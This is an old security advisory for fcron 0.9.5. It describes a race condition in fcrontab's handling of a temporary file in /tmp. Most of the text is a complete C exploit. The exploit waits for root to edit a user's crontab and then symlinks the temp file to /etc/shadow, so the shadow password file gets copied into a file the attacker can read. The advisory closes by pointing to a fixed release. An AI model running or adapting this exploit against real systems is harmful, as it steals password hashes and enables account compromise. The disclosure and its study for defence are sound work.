COMMAND

    fcron

SYSTEMS AFFECTED

    fcron 0.9.5

PROBLEM

    _kiss_ found  following.   We need  that root  updates our crontab
    file  (#  fcrontab  -u  kiss  -e).   What  we get?  We get written
    /etc/shadow in our crontab file (or any other file we want).

    This is just a proof  of concept.  What we  have to do is run  the
    exploit above from a normal user shell.  Then, in a root  console,
    we  update  that  user's  crontab.   After  that,  just  check the
    contents of <user>.orig and you'll find /etc/shadow right there.

    /* --------------------------
       fcrontab exploit by _kiss_
       --------------------------
    */
    
    #include <stdio.h>
    #include <sys/types.h>
    #include <sys/stat.h>
    #include <time.h>
    #include <dirent.h>
    
    #define TRUE 1
    
    void main() {
    
             struct stat buf;
             time_t modif1,modif2;
             DIR *dir;
             struct dirent *direntry;
              int found=0;
              char string[200];
              char string2[200];
    
             printf ("---------------------------------------------\n");
             printf ("              fcrontab exploit by _kiss_\n");
             printf (" Helios Security and Administration (HeliSec)\n\n");
             printf (" Greets: Jet-Li (for teaching me some lessons of shell\n");
             printf ("            that i will need someday) :D\n");
             printf ("---------------------------------------------\n");
    
             /* we wait till /tmp/fcrontab is created */
             printf("\nwaiting for /tmp/fcrontab to be created...\n");
    
             while(!found) {
    
                     dir=opendir("/tmp");
    
                     while ((direntry=readdir(dir))!=NULL) {
                             if (strncmp("fcrontab",direntry->d_name,8)==0)
                                     found=1;
                             if (found==1) break;
                     }
    
                     closedir(dir);
             }
    
             strcpy(string,"/tmp/");
             strcat(string,direntry->d_name);
    
             while (TRUE) {
                     if (stat(string,&buf)!=-1)
                             break;
             }
    
             /* we store date of last modification */
             printf("/tmp/fcrontab created. waiting for the update...\n");
             modif1=buf.st_mtime;
    
             /* we wait till /tmp/fcrontab is updated */
             do {
                     stat(string,&buf);
                     modif2=buf.st_mtime;
             } while (modif1==modif2);
    
             /* we make the symlink */
             printf("making a symlink to /etc/shadow...\n");
             strcpy(string2,"ln -fs /etc/shadow ");
             strcat(string2,string);
             system(string2);
    
             /* we should now have /etc/shadow in /var/spool/fcron/kiss.orig */
             printf("... now check /var/spool/fcron/kiss.orig\n");
    }

SOLUTION

    A new version has been  released to correct this bug  (1.0.1), and
    it can be found at fcron.free.fr.